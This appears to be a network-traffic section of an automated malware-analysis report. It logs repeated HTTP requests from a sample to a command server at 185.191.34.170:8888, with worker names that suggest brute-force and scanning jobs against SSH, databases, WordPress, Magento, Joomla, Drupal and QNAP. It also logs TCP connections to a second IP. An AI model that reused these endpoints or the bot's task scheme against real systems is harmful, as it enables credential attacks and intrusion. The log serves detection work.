Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=ssh_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=mysql_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=postgres_b HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=htpasswdBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=magentoBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=admfind HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpMagOcart HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=bitrixBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=Woo HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=joomlaBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpChk&v=new HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=qnapBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=wpInst HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalChk HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=drupalBrt HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartBrt&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=backup&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /project/active HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close
Source: global traffic	HTTP traffic detected: GET /gw?worker=OCartChk&v=newback HTTP/1.1Host: 185.191.34.170:8888User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0Accept-Encoding: gzipConnection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
Source: unknown	TCP traffic detected without corresponding DNS query: 91.241.19.52
